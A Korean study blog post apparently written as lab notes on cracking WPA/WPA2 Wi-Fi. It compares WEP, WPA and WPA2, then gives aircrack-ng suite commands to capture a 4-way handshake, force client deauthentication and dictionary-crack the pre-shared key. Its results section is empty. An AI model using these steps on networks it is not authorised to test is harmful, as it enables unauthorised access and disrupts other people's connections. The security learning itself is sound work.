메모장 입니다2
무선랜해킹] WPA/WPA2 크랙 본문
1.분류
1)WEP(Wired Equivalent Privacy)
->802.11의 초기 보안 프로토콜.
->고정키/RC4 암호화 사용.
->취약.
2)WPA(WiFi Protected Access)
->802.11i 구현단계에서, 임시방안으로 사용되던 보안 프로토콜.
->동적키(TKIP)/RC4 사용 //하지만 AES도 사용가능하다고 함.
3)WPA2(≒802.11i)
->WPA와 동일한 방식.
->동적키(AES-CCMP)/AES 사용 //TKIP도 사용가능.
*AES-CCMP
:이 방식은 WPA2에서 사용하는 암호화 프로토콜이며, AES 암호화 알고리즘의 CCM Mode 를 기반으로 한다.
CCM 모드란 Counter Mode + CBC 를 의미한다. Key 길이와 IV 길이는 128bit, 48bit 로서 TKIP 와 같다.
TKIP 와 다른 점은 암호화 알고리즘에서 AES(고급 암호화 표준) 을 사용했다는 점이다. AES는 1997년 1월, 기존의 데이터 암호 표준인 DES를 대체할 보다 강력한 알고리즘을 찾기 위해 세계적인 공모를 통해 선정된 차세대 암호화 알고리즘이다. TKIP 에서 사용한 RC4 알고리즘은 키 스트림 암호화 인데 반해, AES 는 블록 암호화를 사용한 알고리즘이며, RC4 알고리즘보다 훨씬 강력하다. 따라서 WPA 에 비해 WPA2 가 더 강력한 보안을 제공한다고 할 수 있다.
또한 TKIP 는 데이터 무결성과 데이터 인증을 위해 Michael(or MIC) 을 사용하지만, CCMP 에서는 CBC-MAC(The Cipher Block Chaining Message Authentication Code) 을 사용한다.
4)비교
2.WPA/WPA2
-인증 절차
1)802.11i
2)4-way Handshaking
->키 인증 절차에 사용되는 4-way handshake의 사전 공유키를 이용하여 크랙.
->사전공유키: PSK암호와 SSID를 이용해, 암호키 생성함수(PBKDF2)로 키가 생성됨.
>>PSK암호를 예상하여 사전공유키 생성 후 비교하는 방식.
-실습
1)4-way handshake 패킷 캡쳐
`airodump-ng --essid "UNICORN" --channel 6 --write crack wlan0mon`
:모니터링 및 로깅.
`aireplay-ng --deauth 1 -e "UNICORN" wlan0mon`
:인증해제 패킷을 전송
->해당 클라이언트는 AP에 재연결을 시도(4-way handshake)
2)예상 패스워드 목록파일과 4way-handshake 캡쳐파일을 이용하여 크랙.
`aircrack-ng crack-01.cap -w password.lst`
3)결과
ㅅ
'Study > 무선랜' 카테고리의 다른 글
무선랜해킹] 인프라/클라이언트 공격 (0) | 2017.08.08 |
---|---|
무선랜해킹] Hidden ssid, 맥 필터링 (0) | 2017.08.08 |
무선랜해킹] 802.11, 명령어 (0) | 2017.08.08 |